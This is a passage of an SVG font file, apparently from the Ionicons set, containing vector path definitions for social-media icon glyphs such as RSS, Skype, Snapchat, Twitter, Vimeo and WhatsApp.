v0c-23 0 -42 17 -44 40l-67 14l-22 -74c49 -3 93 -17 125 -40c9 8 21 13 34 13c27 0 49 -22 49 -50zM34 177c5 15 15 29 29 41c-4 3 -9 5 -15 5c-14 0 -25 -11 -25 -25c0 -9 4 -17 11 -21zM358 339c0 -9 7 -17 16 -17s17 8 17 17s-8 17 -17 17s-16 -8 -16 -17zM127 160
c0 -18 14 -32 32 -32s32 14 32 32s-14 31 -32 31s-32 -13 -32 -31zM224 48c48 0 77 29 78 30l-13 12s-25 -24 -65 -24c-41 0 -64 24 -64 24l-13 -12c1 -1 29 -30 77 -30zM291 128c18 0 32 14 32 32s-14 31 -32 31s-32 -13 -32 -31s14 -32 32 -32zM415 176c7 5 11 13 11 22
c0 14 -11 25 -25 25c-6 0 -11 -2 -15 -5c14 -12 24 -27 29 -42z" />
    <glyph glyph-name="ion-social-rss-outline" unicode="&#xf23c;" horiz-adv-x="384" 
d="M56 112c31 0 56 -25 56 -56s-25 -56 -56 -56s-56 25 -56 56s25 56 56 56zM56 16c22 0 40 18 40 40s-18 40 -40 40s-40 -18 -40 -40s18 -40 40 -40zM0 256c140 0 256 -116 256 -256h-80c0 48 -14 94 -48 128s-80 48 -128 48v80zM240 16c-2 26 -8 52 -19 77
c-12 28 -30 54 -52 76s-48 40 -76 52c-25 10 -51 16 -77 18v-47c50 -3 92 -22 123 -53s50 -73 53 -123h48zM0 384c212 0 384 -172 384 -384h-80c0 171 -133 304 -304 304v80zM227 228c56 -56 89 -131 93 -212h48c-8 190 -162 344 -352 352v-48c81 -4 155 -36 211 -92z" />
    <glyph glyph-name="ion-social-rss" unicode="&#xf23d;" horiz-adv-x="384" 
d="M56 112c31 0 56 -25 56 -56s-25 -56 -56 -56s-56 25 -56 56s25 56 56 56zM0 256c140 0 256 -116 256 -256h-80c0 48 -14 94 -48 128s-80 48 -128 48v80zM0 384c212 0 384 -172 384 -384h-80c0 171 -133 304 -304 304v80z" />
    <glyph glyph-name="ion-social-sass" unicode="&#xf4ea;" horiz-adv-x="512" 
d="M512 119v-8c-1 -9 -7 -17 -15 -22s-12 -4 -13 -3s1 3 4 5c13 8 17 20 10 33c-5 10 -15 16 -26 20c-24 8 -48 7 -72 0c4 -12 7 -23 -2 -34c-10 -12 -23 -19 -39 -22c-7 -2 -14 2 -15 9c-3 19 17 36 30 47c-7 11 -11 24 -14 37c-15 -17 -31 -40 -26 -61
c3 -14 -1 -27 -14 -36s-30 -14 -46 -11c-4 1 -6 5 -5 8c2 14 25 32 35 43c2 2 3 4 1 7c-6 12 -10 23 -14 36c-13 -29 -30 -80 -57 -98c-9 -6 -17 -4 -21 5c-3 8 -2 20 -1 29c-6 -13 -11 -27 -20 -38c-7 -8 -24 -7 -30 1c-16 21 -13 50 -5 73l-29 -15c7 -16 8 -32 4 -49
c-5 -19 -17 -35 -35 -46c-19 -12 -64 -24 -77 4c-7 16 -4 30 6 44c17 24 48 37 74 50c-32 23 -80 42 -96 80c-15 35 17 68 43 89c59 48 166 95 244 59c15 -7 36 -24 31 -52c-4 -24 -13 -39 -28 -54c-32 -32 -152 -77 -176 -15c-1 1 -1 4 1 4c2 -1 20 -15 43 -16
c17 -1 36 3 52 8c33 11 71 33 80 67c4 13 -2 28 -15 34c-49 24 -116 -4 -159 -26c-33 -17 -84 -45 -82 -87c1 -37 56 -60 81 -82c15 7 42 15 52 27c11 13 26 25 44 26c8 0 14 -3 16 -10c2 -6 1 -11 0 -19c5 4 11 4 15 -1c12 -14 -22 -50 -10 -66c14 14 21 42 30 59
c4 8 17 51 26 53c7 2 18 4 25 0c2 -1 3 -3 2 -5c-7 -19 -7 -33 3 -52c14 20 29 43 34 67c1 2 3 3 5 4c7 2 18 3 25 0c3 -1 3 -2 2 -5c-7 -22 -6 -38 6 -58c31 11 69 15 97 -5c-3 2 -7 5 0 0c5 -4 3 -2 0 0c12 -8 19 -18 21 -32zM113 94v0c1 7 -1 13 -3 20
c-24 -8 -66 -35 -64 -62c1 -10 8 -13 17 -12s19 7 27 13c14 11 22 24 23 41zM216 166c1 3 -2 5 -5 4c-29 -8 -43 -57 -33 -81c1 -3 4 -3 6 -1c17 16 28 56 32 78zM286 84c8 -3 27 17 26 27c-8 -9 -18 -18 -26 -27zM367 102c11 6 16 19 12 30c-8 -6 -21 -19 -20 -31
c0 -2 6 0 8 1z" />
    <glyph glyph-name="ion-social-skype-outline" unicode="&#xf23e;" horiz-adv-x="384" 
d="M106 352c-41 0 -74 -33 -74 -73c0 -13 4 -25 10 -36l6 -11l-2 -12c-2 -10 -3 -20 -3 -30c0 -40 16 -77 44 -105s67 -44 107 -44c9 0 19 1 28 3l11 2l9 -5c11 -6 24 -9 36 -9c41 0 74 33 74 73c0 11 -3 22 -8 32l-5 10l3 11c2 10 3 21 3 32c0 40 -16 77 -44 105
s-67 43 -107 43c-9 0 -18 0 -26 -2l-12 -2l-10 7c-12 7 -26 11 -40 11zM106 384v0c21 0 40 -6 56 -16c10 2 21 2 32 2c101 0 183 -80 183 -180c0 -13 -1 -27 -4 -39c7 -14 11 -29 11 -46c0 -58 -47 -105 -106 -105c-18 0 -35 4 -50 12c-11 -2 -22 -3 -34 -3
c-101 0 -183 81 -183 181c0 12 2 24 4 36c-9 16 -15 34 -15 53c0 58 47 105 106 105zM288 104c-8 -12 -21 -21 -37 -28s-36 -10 -58 -10c-26 0 -48 5 -65 14c-12 7 -22 15 -30 26s-12 22 -12 33c0 7 3 12 8 17s11 7 19 7c6 0 12 -2 16 -6s7 -8 10 -15s7 -13 11 -18
s8 -9 15 -12s16 -5 27 -5c15 0 28 4 37 10s13 13 13 22c0 7 -2 13 -7 17c-5 5 -11 9 -19 11c-8 3 -20 5 -34 8c-19 4 -35 9 -48 14c-13 6 -24 13 -32 23s-11 22 -11 36s4 25 12 36c8 10 20 19 36 25c15 6 34 8 54 8c16 0 30 -1 42 -5s23 -9 31 -15s14 -13 18 -20
s5 -14 5 -21c0 -6 -2 -12 -7 -17s-11 -8 -19 -8c-7 0 -12 2 -16 5c-3 3 -7 7 -11 14c-5 8 -10 15 -16 20s-17 8 -31 8c-13 0 -23 -3 -31 -8s-12 -11 -12 -18c0 -4 2 -7 4 -10c3 -3 6 -6 11 -8s10 -5 15 -6s13 -3 25 -6c15 -3 28 -6 40 -10s23 -8 32 -14s15 -13 20 -22
s8 -20 8 -32c0 -15 -5 -28 -13 -40z" />
    <glyph glyph-name="ion-social-skype" unicode="&#xf23f;" horiz-adv-x="384" 
d="M373 151c7 -14 11 -29 11 -46c0 -58 -47 -105 -106 -105c-18 0 -35 4 -50 12c-11 -2 -22 -3 -34 -3c-101 0 -183 81 -183 181c0 12 2 24 4 36c-9 16 -15 34 -15 53c0 58 47 105 106 105c21 0 41 -6 57 -16c10 2 20 2 31 2c101 0 183 -80 183 -180c0 -13 -1 -27 -4 -39z
M288 104c9 12 12 25 12 40c0 12 -2 23 -7 32s-12 16 -21 22s-19 10 -31 14s-26 7 -41 10c-12 3 -20 5 -25 6s-10 4 -15 6s-7 5 -10 8c-2 3 -4 6 -4 10c0 7 3 13 11 18s19 7 32 7c14 0 25 -2 31 -7s11 -12 16 -20c4 -7 8 -11 11 -14c4 -3 9 -5 16 -5c8 0 13 3 18 8s8 11 8 17
c0 7 -2 14 -6 21s-10 14 -18 20s-18 11 -30 15s-27 5 -43 5c-20 0 -38 -2 -53 -8c-16 -6 -28 -15 -36 -25c-8 -11 -12 -22 -12 -36s3 -26 11 -36s19 -17 32 -23c13 -5 29 -10 48 -14c14 -3 26 -5 34 -8c8 -2 14 -6 19 -11c5 -4 7 -10 7 -17c0 -9 -4 -17 -13 -23
s-22 -9 -37 -9c-11 0 -20 2 -27 5s-11 6 -15 11s-8 12 -11 19s-6 11 -10 15s-10 6 -16 6c-8 0 -14 -2 -19 -7s-8 -10 -8 -17c0 -11 4 -22 12 -33s18 -19 30 -26c17 -9 39 -14 65 -14c22 0 42 3 58 10s29 16 37 28z" />
    <glyph glyph-name="ion-social-snapchat-outline" unicode="&#xf4eb;" horiz-adv-x="480" 
d="M240 400v0v0c-71 0 -128 -54 -118 -128c2 -15 3 -32 4 -45c0 0 -2 -5 -12 -5c-6 0 -15 2 -28 7c-2 1 -4 1 -6 1c-8 0 -13 -6 -14 -12c0 -5 4 -11 8 -13c14 -7 47 -10 47 -33s-23 -47 -41 -64s-64 -21 -64 -21s0 -21 32 -29s32 -5 33 -13c2 -15 1 -22 11 -22c2 0 4 1 6 1
c8 1 20 3 32 3c11 0 23 -2 34 -9c23 -15 41 -34 76 -34s53 19 76 34c11 7 24 9 35 9c12 0 23 -2 31 -3c2 0 4 -1 6 -1c10 0 9 7 11 22c1 8 1 5 33 13s32 29 32 29s-46 4 -64 21s-41 41 -41 64s33 26 47 33c4 2 9 8 9 13c-1 6 -6 12 -14 12c-2 0 -5 0 -7 -1
c-13 -5 -21 -6 -27 -6c-10 0 -13 4 -13 4c1 13 2 30 4 45c10 74 -47 128 -118 128zM240 416v0c41 0 80 -16 105 -45c24 -28 34 -63 29 -101c-1 -11 -2 -22 -3 -31c4 1 10 2 18 5c4 1 8 2 12 2c16 0 29 -12 30 -27c1 -13 -9 -25 -18 -29c-4 -2 -9 -3 -14 -5
c-7 -2 -14 -5 -19 -8c-4 -3 -5 -4 -5 -5c0 -16 20 -37 36 -52c11 -10 39 -16 54 -17l15 -1v-14c0 -2 0 -11 -6 -21c-5 -8 -16 -19 -38 -24c-6 -1 -11 -3 -15 -4c-2 -1 -5 -1 -7 -1v-1c-1 -7 -1 -13 -4 -18c-2 -5 -9 -12 -22 -12c-2 0 -6 0 -9 1c-2 0 -3 1 -5 1
c-7 1 -15 2 -23 2c-10 0 -19 -2 -26 -6c-4 -3 -9 -7 -14 -10c-18 -13 -38 -27 -71 -27s-53 14 -71 27c-5 3 -9 7 -14 10c-7 4 -15 6 -25 6c-8 0 -17 -1 -24 -2c-2 0 -3 -1 -5 -1c-3 -1 -7 -1 -9 -1c-13 0 -20 7 -22 12c-3 5 -3 11 -4 18v1c-2 0 -4 0 -6 1c-4 1 -10 3 -16 4
c-22 5 -33 16 -38 24c-6 10 -6 18 -6 20v15l15 1c16 1 44 7 54 17c29 27 36 43 36 52c0 1 0 2 -4 5c-5 3 -13 6 -20 8c-5 2 -10 3 -14 5c-9 4 -18 16 -17 29c1 15 14 27 30 27c4 0 8 0 12 -2c8 -3 13 -4 17 -5c-1 9 -2 19 -3 30c-5 38 5 74 29 102c25 29 64 45 105 45v0z
M240 219c-21 0 -41 8 -56 23c-3 3 -3 9 0 12s9 3 12 0c12 -12 27 -19 44 -19c16 0 32 7 44 19c3 3 9 3 12 0s3 -9 0 -12c-15 -15 -35 -23 -56 -23zM176 296c0 16 5 24 16 24s16 -8 16 -24s-5 -24 -16 -24s-16 8 -16 24zM272 296c0 16 5 24 16 24s16 -8 16 -24
s-5 -24 -16 -24s-16 8 -16 24z" />
    <glyph glyph-name="ion-social-snapchat" unicode="&#xf4ec;" horiz-adv-x="480" 
d="M480 88c0 -2 0 -11 -6 -21c-5 -8 -16 -19 -38 -24c-6 -1 -11 -3 -15 -4c-2 -1 -5 -1 -7 -1v-1c-1 -7 -1 -13 -4 -18c-2 -5 -9 -12 -22 -12c-2 0 -6 0 -9 1c-2 0 -3 1 -5 1c-7 1 -15 2 -23 2c-10 0 -19 -2 -26 -6c-4 -3 -9 -7 -14 -10c-18 -13 -38 -27 -71 -27
s-53 14 -71 27c-5 3 -9 7 -14 10c-7 4 -15 6 -25 6c-8 0 -17 -1 -24 -2c-2 0 -3 -1 -5 -1c-3 -1 -7 -1 -9 -1c-13 0 -20 7 -22 12c-3 5 -3 11 -4 18v1c-2 0 -4 0 -6 1c-4 1 -10 3 -16 4c-22 5 -33 16 -38 24c-6 10 -6 18 -6 20v15l15 1c16 1 44 7 54 17c29 27 36 43 36 52
c0 1 0 2 -4 5c-5 3 -13 6 -20 8c-5 2 -10 3 -14 5c-9 4 -18 16 -17 29c1 15 14 27 30 27c4 0 8 0 12 -2c8 -3 13 -4 17 -5c-1 9 -2 19 -3 30c-5 38 5 74 29 102c25 29 64 45 105 45v0c41 0 80 -16 105 -45c24 -28 34 -63 29 -101c-1 -11 -2 -22 -3 -31c4 1 10 2 18 5
c4 1 8 2 12 2c16 0 29 -12 30 -27c1 -13 -9 -25 -18 -29c-4 -2 -9 -3 -14 -5c-7 -2 -14 -5 -19 -8c-4 -3 -5 -4 -5 -5c0 -16 20 -37 36 -52c11 -10 39 -16 54 -17l15 -1v-14zM192 320c-9 0 -16 -11 -16 -24s7 -24 16 -24s16 11 16 24s-7 24 -16 24zM296 242c3 3 3 9 0 12
s-9 3 -12 0c-12 -12 -28 -19 -44 -19c-17 0 -32 7 -44 19c-3 3 -9 3 -12 0s-3 -9 0 -12c15 -15 35 -23 56 -23s41 8 56 23zM288 272c9 0 16 11 16 24s-7 24 -16 24s-16 -11 -16 -24s7 -24 16 -24z" />
    <glyph glyph-name="ion-social-tumblr-outline" unicode="&#xf240;" horiz-adv-x="256" 
d="M193 52c21 0 42 6 63 20v-65c-18 -8 -34 -15 -48 -18s-28 -5 -45 -5c-19 0 -35 2 -50 7c-14 5 -28 12 -38 21s-17 18 -21 28s-6 25 -6 44v140h-48v58c16 5 30 14 42 24s19 21 26 35s11 37 14 59h62v-112h96v-64h-96v-101c0 -24 1 -40 4 -47c2 -7 7 -12 14 -16
c9 -6 19 -8 31 -8zM240 17v29c-15 -6 -31 -10 -47 -10c-15 0 -28 3 -40 10c-10 6 -17 15 -21 25c-2 6 -4 17 -4 52v117h96v32h-96v112h-32c-2 -16 -7 -36 -14 -50c-8 -16 -17 -29 -30 -40c-11 -9 -23 -17 -36 -23v-31h48v-156c0 -21 2 -32 4 -38c3 -8 10 -15 18 -22
c9 -8 19 -14 31 -18c13 -4 29 -6 46 -6c16 0 28 2 41 5c11 2 23 6 36 12z" />
    <glyph glyph-name="ion-social-tumblr" unicode="&#xf241;" horiz-adv-x="256" 
d="M193 52c21 0 42 6 63 20v-65c-18 -8 -34 -15 -48 -18s-28 -5 -45 -5c-19 0 -35 2 -50 7c-14 5 -28 12 -38 21s-17 18 -21 28s-6 25 -6 44v140h-48v58c16 5 30 14 42 24s19 21 26 35s11 37 14 59h62v-112h96v-64h-96v-101c0 -24 1 -40 4 -47c2 -7 7 -12 14 -16
c9 -6 19 -8 31 -8z" />
    <glyph glyph-name="ion-social-tux" unicode="&#xf2c5;" horiz-adv-x="383" 
d="M189 347c2 2 -1 -1 0 0c2 2 4 4 6 5c-3 -2 -5 -4 -7 -8c0 1 0 2 1 3zM361 52c7 -4 23 -11 21 -22c-2 -10 -17 -15 -24 -19c-15 -8 -28 -14 -41 -25c-9 -8 -17 -15 -29 -17c-11 -2 -25 -1 -33 8c-5 5 -7 11 -15 12c-25 5 -54 4 -79 0c-13 -2 -21 -11 -32 -17
c-10 -5 -20 -5 -30 -1c-13 5 -27 10 -41 13s-29 5 -43 9c-31 8 -5 30 -11 50c-3 12 -10 29 8 30c9 1 27 -1 31 11c2 7 -2 15 2 22s-1 17 1 25c4 18 19 32 25 49c5 14 8 25 18 37c9 11 22 22 29 34c10 18 9 35 8 55c-1 17 -1 33 -2 50c0 33 20 60 58 60h14
c38 0 63 -32 64 -69c0 -19 -5 -38 5 -67c15 -27 36 -48 52 -73c10 -16 16 -31 20 -49c3 -14 9 -31 7 -45c-1 -6 -2 -9 -4 -11c3 -1 7 -2 9 -5c3 -4 2 -11 0 -26c-1 -8 5 -15 12 -19zM137 -3c2 20 -15 39 -25 56c-10 16 -21 43 -39 52c-8 4 -19 5 -23 -5c-2 -7 0 -19 -2 -22
c-4 -9 -14 -10 -23 -11c-6 0 -17 0 -17 -8c1 -10 10 -20 7 -30c-2 -7 -8 -12 -8 -19c0 -14 38 -15 47 -17c19 -4 37 -14 57 -16c12 -1 25 7 26 20zM253 62c-2 10 2 -10 0 0s-5 28 1 35c4 5 10 6 17 5c0 4 1 9 3 12c8 13 29 8 39 0l-1 2c-3 4 -8 9 -13 10c0 0 4 12 2 34
c-4 40 -33 62 -33 62c27 -30 27 -58 27 -72c0 -6 -1 -18 -4 -24c-4 -1 -7 -2 -11 -4c-10 -5 -8 2 -8 10c0 18 -2 36 -7 54c-3 9 -7 17 -13 24c-4 5 -4 9 -5 15c-3 12 -9 22 -16 32c-7 9 -7 17 -5 28c1 7 2 14 -6 17c-6 2 -26 5 -27 14c-1 6 -1 16 5 20c16 14 30 -11 17 -24
c-3 -3 7 -4 8 -4c4 1 4 7 5 10c1 4 1 9 1 13c0 17 -18 32 -34 21c-6 -4 -9 -11 -10 -17c0 -2 -1 -20 0 -20c-4 0 -7 5 -11 5c-3 0 -7 0 -10 -1c0 0 2 14 -2 22c-4 9 -18 16 -24 4s-3 -25 0 -31s4 -6 4 -6c2 1 5 4 5 4s-6 3 -7 11c-1 9 3 14 7 15s10 -2 12 -8s0 -13 0 -13
c-7 -6 -30 -18 -22 -28c14 -18 33 -15 52 -9c8 3 18 5 24 12c3 3 11 2 8 -4c-2 -5 -18 -7 -22 -9c-9 -4 -18 -8 -28 -10c-6 -1 -13 -5 -28 9c7 -6 8 -16 17 -20c13 -6 33 9 44 15c1 1 16 5 14 0c-1 -4 -11 -7 -15 -9c-11 -6 -23 -21 -36 -22c-8 -1 -21 16 -25 22
c-1 1 -5 9 -6 4c-1 -8 2 -14 -3 -21c-6 -9 -11 -18 -13 -29c-1 -6 0 -11 -3 -16c-11 -15 -17 -33 -19 -51c0 -4 3 -43 -5 -41c-18 5 -17 33 -14 47c-3 -12 -8 -30 2 -44c12 -15 99 -55 53 -80c7 -14 14 -25 12 -41c8 7 2 20 -1 28c0 0 17 -12 38 -10c17 2 32 7 46 16
c6 4 11 9 16 14c1 2 4 6 6 7l1 -11c2 -17 -12 -27 -10 -34c4 8 11 14 13 24c3 12 0 24 -2 36zM155 323v0v-3c2 0 2 5 1 8c-1 4 -3 6 -4 6h-2c3 -2 5 -6 5 -11zM210 335c3 -2 0 0 0 0c3 -2 5 -5 5 -10v-3c2 0 3 4 2 7s-3 6 -5 6h-2zM347 15c24 11 -24 -10 0 0
c24 11 35 17 20 26c-17 10 -26 13 -26 29c0 5 4 16 2 22c-1 4 -6 5 -9 5c-10 -10 -17 -25 -34 -25c-14 0 -25 11 -28 24c-4 2 -10 1 -13 -4c-6 -12 1 -29 3 -41c2 -18 -4 -35 -2 -53c2 -21 26 -22 40 -13c16 10 29 22 47 30z" />
    <glyph glyph-name="ion-social-twitch-outline" unicode="&#xf4ed;" horiz-adv-x="416" 
d="M32 416h384v-272l-112 -112h-80l-64 -64h-64v64h-96v304zM368 160v208h-304v-272h80v-64l64 64h96zM272 176v129h48v-129h-48zM160 176v129h48v-129h-48z" />
    <glyph glyph-name="ion-social-twitch" unicode="&#xf4ee;" horiz-adv-x="416" 
d="M32 416h384v-272l-112 -112h-80l-64 -64h-64v64h-96v304zM208 176v129h-48v-129h48zM320 176v129h-48v-129h48z" />
    <glyph glyph-name="ion-social-twitter-outline" unicode="&#xf242;" horiz-adv-x="472" 
d="M472 338c-13 -20 -29 -36 -48 -50v-12c0 -128 -98 -276 -276 -276c-55 0 -105 16 -148 44c8 -1 15 -2 23 -2c45 0 87 16 120 42c-42 1 -78 29 -90 67c6 -1 12 -2 18 -2c9 0 18 2 26 4c-44 9 -78 48 -78 95v1c13 -7 28 -12 44 -12c-26 17 -43 47 -43 81c0 18 5 34 13 48
c48 -59 119 -97 199 -101c-2 7 -2 14 -2 22c0 54 43 97 97 97c28 0 52 -12 70 -31c22 4 43 13 62 24c-7 -23 -23 -42 -43 -54c20 2 39 7 56 15zM414 301c3 2 8 6 11 8c-2 0 -11 -2 -19 -1s-21 5 -21 5s14 13 18 17l11 11c-4 -1 -10 -2 -14 -3l-8 -2l-6 6
c-15 16 -37 26 -59 26c-45 0 -81 -37 -81 -81c0 -6 1 -12 2 -18l5 -21l-22 1c-42 2 -81 13 -118 32c-28 14 -53 34 -75 56c-1 -6 -2 -13 -2 -19c0 -27 14 -53 36 -68c0 0 33 -23 46 -29c-24 -2 -56 0 -56 0c-8 0 -16 1 -24 3c8 -28 32 -50 62 -56l61 -10l-61 -21
c-7 -2 -14 -3 -21 -3c15 -20 38 -34 64 -34l45 -1l-35 -28c-18 -14 -38 -25 -60 -33c-10 -3 -19 -6 -29 -8c27 -9 55 -14 84 -14c40 0 78 8 112 24c31 14 58 34 81 60c22 24 38 53 50 84c11 30 17 62 17 92v12l-1 8z" />
    <glyph glyph-name="ion-social-twitter" unicode="&#xf243;" horiz-adv-x="472" 
d="M472 338c-13 -20 -29 -36 -48 -50v-12c0 -128 -98 -276 -276 -276c-55 0 -105 16 -148 44c8 -1 15 -2 23 -2c45 0 87 16 120 42c-42 1 -78 29 -90 67c6 -1 12 -2 18 -2c9 0 18 2 26 4c-44 9 -78 48 -78 95v1c13 -7 28 -12 44 -12c-26 17 -43 47 -43 81c0 18 5 34 13 48
c48 -59 119 -97 199 -101c-2 7 -2 14 -2 22c0 54 43 97 97 97c28 0 52 -12 70 -31c22 4 43 13 62 24c-7 -23 -23 -42 -43 -54c20 2 39 7 56 15z" />
    <glyph glyph-name="ion-social-usd-outline" unicode="&#xf352;" horiz-adv-x="320" 
d="M125 345c11 2 19 3 19 3v-131l-22 6c-15 5 -27 11 -36 19c-12 10 -19 25 -19 43c0 13 4 24 11 33c6 8 13 14 22 19c7 4 17 6 25 8zM128 238v92c-7 -2 -15 -4 -21 -7c-7 -4 -12 -9 -17 -15s-7 -14 -7 -23c0 -13 4 -24 13 -31c8 -7 20 -12 32 -16zM252 151
c10 -10 15 -24 15 -42c0 -9 -1 -18 -5 -27s-11 -17 -20 -24c-8 -6 -18 -11 -31 -15c-6 -2 -11 -3 -17 -4s-18 -1 -18 -1v145l20 -5c10 -3 19 -6 28 -9c10 -4 20 -10 28 -18zM247 89c3 7 4 13 4 20c0 14 -3 24 -10 31s-15 11 -23 14s-16 5 -26 8v-107c6 1 10 2 14 3
c11 3 20 8 27 13s11 11 14 18zM315 145c3 -10 5 -19 5 -29c0 -21 -5 -38 -14 -53s-20 -26 -35 -35s-31 -17 -50 -21c-10 -2 -19 -3 -29 -4v-35h-64v35c-9 1 -19 4 -28 6c-20 5 -36 12 -51 23s-26 24 -35 41c-8 16 -13 34 -14 55h69c0 -12 2 -24 7 -33c5 -10 12 -17 21 -23
s20 -11 31 -14v120c-8 2 -18 4 -27 6c-17 4 -30 9 -41 16s-20 15 -27 23s-11 17 -14 26s-4 18 -4 28c0 18 4 34 12 48s19 25 33 34s29 16 46 20c7 2 15 3 22 4v33h64v-33c9 -1 16 -4 24 -6c18 -5 34 -12 48 -22s25 -22 33 -37c7 -13 11 -28 12 -46h-69c-3 21 -12 37 -26 46
c-7 4 -13 8 -22 10v-106c9 -2 16 -4 25 -6c12 -3 22 -6 27 -7c13 -4 23 -9 33 -15c10 -7 18 -14 24 -22s11 -17 14 -27zM293 72c7 12 11 27 11 44c0 8 -1 16 -4 24s-7 15 -12 22s-12 13 -20 19c-8 5 -18 10 -29 13c-5 1 -13 3 -24 6h-1l-4 1c-7 2 -13 4 -21 6l-13 3v137
s9 -1 19 -4s19 -6 28 -12c15 -9 25 -24 30 -43h38c-2 8 -4 15 -8 22c-7 13 -16 24 -28 32c-12 9 -27 16 -43 20c-8 2 -16 4 -23 5l-13 2v31h-32v-31l-14 -2c-7 -1 -14 -2 -20 -4c-15 -4 -29 -10 -41 -18s-21 -16 -28 -28c-7 -11 -10 -24 -10 -40c0 -8 1 -15 3 -23
c2 -7 6 -14 11 -21s14 -13 23 -19c10 -6 22 -10 37 -14v0v0c4 -1 8 -2 11 -3c5 -1 11 -3 16 -4l12 -3v-151s-8 1 -20 4s-26 8 -36 15c-11 8 -20 18 -26 30c-4 7 -6 16 -8 24h-36c2 -11 5 -23 10 -32c8 -14 17 -26 30 -35c13 -10 28 -16 46 -21c8 -2 17 -4 26 -5l14 -2v-33
h32v33l15 1c9 1 17 3 26 5c17 4 32 10 45 18s23 19 31 31z" />
    <glyph glyph-name="ion-social-usd" unicode="&#xf353;" horiz-adv-x="320" 
d="M315 145c3 -10 5 -19 5 -29c0 -21 -5 -38 -14 -53s-20 -26 -35 -35s-31 -17 -50 -21c-10 -2 -19 -3 -29 -4v-35h-64v35c-9 1 -19 4 -28 6c-20 5 -36 12 -51 23s-26 24 -35 41c-8 16 -13 34 -14 55h69c0 -12 2 -24 7 -33c5 -10 12 -17 21 -23s20 -11 31 -14v120
c-8 2 -18 4 -27 6c-17 4 -30 9 -41 16s-20 15 -27 23s-11 17 -14 26s-4 18 -4 28c0 18 4 34 12 48s19 25 33 34s29 16 46 20c7 2 15 3 22 4v33h64v-33c9 -1 16 -4 24 -6c18 -5 34 -12 48 -22s25 -22 33 -37c7 -13 11 -28 12 -46h-69c-3 21 -12 37 -26 46c-7 4 -13 8 -22 10
v-106c9 -2 16 -4 25 -6c12 -3 22 -6 27 -7c13 -4 23 -9 33 -15c10 -7 18 -14 24 -22s11 -17 14 -27zM128 238v92c-7 -2 -15 -4 -21 -7c-7 -4 -12 -9 -17 -15s-7 -14 -7 -23c0 -13 4 -24 13 -31c8 -7 20 -12 32 -16zM247 89c3 7 4 13 4 20c0 14 -3 24 -10 31s-15 11 -23 14
s-16 5 -26 8v-107c6 1 10 2 14 3c11 3 20 8 27 13s11 11 14 18z" />
    <glyph glyph-name="ion-social-vimeo-outline" unicode="&#xf244;" 
d="M445 334c7 -33 1 -66 -13 -97s-31 -59 -51 -87c-26 -36 -52 -71 -85 -101c-19 -18 -41 -35 -66 -44c-10 -4 -19 -5 -27 -5c-17 0 -31 9 -44 27c-14 19 -22 40 -28 63c-12 45 -25 90 -38 134c-4 12 -9 22 -15 33c-3 5 -8 10 -12 14c-2 2 -5 3 -8 3s-6 -1 -9 -3
c-10 -6 -28 -18 -28 -18l-21 27c26 24 82 71 82 71c11 9 33 25 48 27h8c18 0 32 -7 42 -22c11 -17 15 -37 18 -57c7 -41 12 -82 24 -122c3 -10 7 -20 12 -29c4 -7 9 -10 14 -10c4 0 7 2 11 5s7 6 10 10c20 24 37 52 48 81c3 9 3 17 3 27c0 13 -10 25 -25 26h-7
c-11 0 -20 -2 -32 -7c6 24 24 62 54 84c20 14 45 20 67 20c10 0 20 -2 27 -4c23 -8 36 -23 41 -46zM418 244c13 30 17 59 11 87c-4 19 -13 28 -30 34c-6 2 -14 3 -22 3c-21 0 -42 -6 -57 -17c-16 -12 -29 -30 -38 -48h6h8c23 -1 39 -19 40 -41c0 -10 0 -22 -4 -34
c-11 -29 -29 -58 -51 -85c-4 -4 -7 -9 -12 -13c-7 -6 -15 -8 -22 -8c-8 0 -18 3 -27 18c-7 11 -11 22 -14 32c-10 31 -14 64 -19 95c-2 10 -3 19 -5 29c-3 17 -6 36 -16 51c-7 10 -16 15 -28 15h-6c-8 -1 -25 -11 -40 -23c-2 -2 -43 -37 -70 -61l2 -3c5 4 12 7 16 10
c6 3 12 5 18 5c7 0 13 -3 18 -7c8 -7 13 -12 16 -18c6 -11 12 -24 16 -37c13 -44 26 -88 38 -133c5 -19 13 -41 26 -59s23 -20 31 -20c6 0 13 1 21 4c23 8 43 25 61 41c32 29 57 63 83 99v0c21 28 37 55 50 84z" />
    <glyph glyph-name="ion-social-vimeo" unicode="&#xf245;" 
d="M445 334c7 -33 1 -66 -13 -97s-31 -59 -51 -87c-26 -36 -52 -71 -85 -101c-19 -18 -41 -35 -66 -44c-31 -11 -52 -5 -71 22c-14 19 -22 40 -28 63c-12 45 -25 90 -38 134c-4 12 -9 22 -15 33c-3 5 -8 10 -12 14c-5 4 -11 3 -17 0c-10 -6 -28 -18 -28 -18l-21 27
c26 24 82 71 82 71c11 9 33 25 48 27c21 3 38 -4 50 -22c11 -17 15 -37 18 -57c7 -41 11 -82 23 -122c3 -10 8 -20 13 -29c7 -11 15 -13 25 -5c4 3 7 6 10 10c20 24 37 52 48 81c3 9 3 17 3 27c0 13 -10 25 -25 26s-24 -1 -39 -7c6 24 24 62 54 84c29 21 71 24 94 16
s36 -23 41 -46z" />
    <glyph glyph-name="ion-social-whatsapp-outline" unicode="&#xf4ef;" 
d="M178 294c4 -11 15 -39 16 -42s2 -6 0 -10s-3 -6 -6 -9s-6 -7 -9 -9c-3 -3 -6 -6 -3 -12s14 -24 30 -39c21 -20 38 -27 44 -30s9 -3 12 1s15 16 19 21s8 5 13 3s31 -17 37 -20s10 -5 11 -7s0 -13 -5 -26s-28 -24 -38 -25s-11 -8 -67 16s-90 84 -93 88s-22 31 -21 58
s17 41 22 46s11 7 15 7h10s9 0 13 -11zM228 384c-50 0 -97 -20 -133 -55c-35 -35 -55 -81 -55 -131c0 -34 9 -67 27 -96l8 -13l-5 -14l-19 -57l61 19l13 4l12 -6c28 -15 59 -23 91 -23c50 0 97 19 133 54c35 35 55 82 55 132s-20 96 -55 131c-36 35 -83 55 -133 55zM228 416
v0c121 0 220 -97 220 -218s-99 -218 -220 -218c-39 0 -74 10 -106 27l-122 -39l40 117c-20 33 -32 72 -32 113c0 121 99 218 220 218z" />
    <glyph glyph-name="ion-social-whatsapp" unicode="&#xf4f0;" 
d="M228 416c121 0 220 -97 220 -218s-99 -218 -220 -218c-39 0 -74 10 -106 27l-122 -39l40 117c-20 33 -32 72 -32 113c0 121 99 218 220 218zM337 115c5 13 6 24 5 26s-5 4 -11 7s-32 18 -37 20s-9 2 -13 -3s-16 -17 -19 -21s-6 -4 -12 -1s-23 10 -44 30
